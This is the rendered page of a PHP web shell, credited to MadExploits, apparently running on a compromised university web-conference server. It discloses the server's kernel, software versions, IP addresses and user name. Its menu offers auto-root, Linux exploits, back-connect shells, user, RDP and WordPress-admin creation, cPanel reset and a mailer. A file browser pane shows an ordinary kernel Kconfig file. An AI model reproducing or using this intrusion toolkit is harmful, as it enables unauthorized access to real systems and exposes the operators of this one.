Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.119.103.130
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.4.0-186 /
drivers /
ipack /
[ HOME SHELL ]
Name
Size
Permission
Action
carriers
[ DIR ]
drwxr-xr-x
devices
[ DIR ]
drwxr-xr-x
Kconfig
670
B
-rw-r--r--
Makefile
171
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Kconfig
# SPDX-License-Identifier: GPL-2.0-only # # IPACK configuration. # menuconfig IPACK_BUS tristate "IndustryPack bus support" depends on HAS_IOMEM ---help--- This option provides support for the IndustryPack framework. There are IndustryPack carrier boards, which interface another bus (such as PCI) to an IndustryPack bus, and IndustryPack modules, that are hosted on these buses. While IndustryPack modules can provide a large variety of functionality, they are most often found in industrial control applications. Say N if unsure. if IPACK_BUS source "drivers/ipack/carriers/Kconfig" source "drivers/ipack/devices/Kconfig" endif # IPACK
Close